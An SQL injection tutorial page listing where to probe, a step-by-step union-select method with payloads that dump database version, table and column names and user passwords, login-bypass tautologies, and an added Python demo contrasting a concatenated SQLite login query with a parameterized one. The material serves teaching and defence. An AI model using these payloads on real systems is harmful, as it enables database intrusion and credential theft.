SQL Injection
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its SQL database.
To find it:
  • Test URL parameters, body parameters, form fields, cookies (session, fehost, TrackingIds related to analytics and any non-standard field), User-Agent and any other non-standard header.
  • Quickly check by hand whether it might be vulnerable, using very simple payloads.
  • Look for differences in response Content-Length and response time; we might be facing Blind SQL Injection.
  • If Blind SQLi is suspected, test true and false statements and compare response size/time to try to extrapolate information.
  • Try Second Order SQL Injection if a username is displayed anywhere in the page and the username format is not validated in the sign-up form.
  • Run a wordlist both replacing the parameter value and appended after a valid value.
  • Run sqlmap (with -p if the vulnerable parameter is known).
Union Select Methodology
  1. Always use comments such as #, -- or -- - at the end of the payloads (syntax depends on the database engine).
  2. Try different numbers of columns until results are returned: param' union select null-- -
  3. query the database version: jeremy' union select null, null, version()-- -
  4. list table names (we might need to replace null with null(int) or 1 to try and match the types of the columns correctly): param' union select null, null, table_name from information_schema.tables-- -
  5. list column names: param' union select null, null, column_name from information_schema.columns-- -
  6. extract a user's password: param' union select password, null, null from table_name-- -
  7. extract all users' passwords: param' union select username, password, null from table_name-- -
Login Bypass
  • SELECT * FROM Users WHERE username: "admin" and password: "admin or 1=1"
  • SELECT * FROM Users WHERE username: "admin" and password: "admin' or 1='1"
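The two login attempts above, traced in an added example that is not part of the original page: the login query built by string concatenation next to its parameterized form, run against a constructed in-memory SQLite table with made-up accounts. The tautology is written as '1'='1' rather than 1='1' because SQLite compares the integer 1 and the text '1' as unequal, so the page's exact payload would not fire in this engine; the quoteless "admin or 1=1" is included to show that without a closing quote the input stays inside the string literal.

```python
import sqlite3

# Constructed sample accounts for the demo (not a real credential store).
SAMPLE_ROWS = [("admin", "S3cret!"), ("alice", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def login_vulnerable(conn, username, password):
    # Values are spliced into the SQL text, so a quote in the input
    # terminates the literal and the remainder is parsed as SQL.
    sql = (f"SELECT username FROM Users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    # Placeholders: the driver binds values separately from the SQL text,
    # so quotes in the input remain data and never become syntax.
    sql = "SELECT username FROM Users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def compare(username, password):
    """Return (vulnerable_result, parameterized_result) for one input pair."""
    conn = make_db()
    return (login_vulnerable(conn, username, password),
            login_parameterized(conn, username, password))


if __name__ == "__main__":
    # Correct password, quoteless attempt, and quote-terminating attempt.
    for pw in ["S3cret!", "admin or 1=1", "admin' or '1'='1"]:
        print(repr(pw), compare("admin", pw))
```

Only the quote-terminating input logs in through the concatenated query, and the parameterized query rejects it while still accepting the real password.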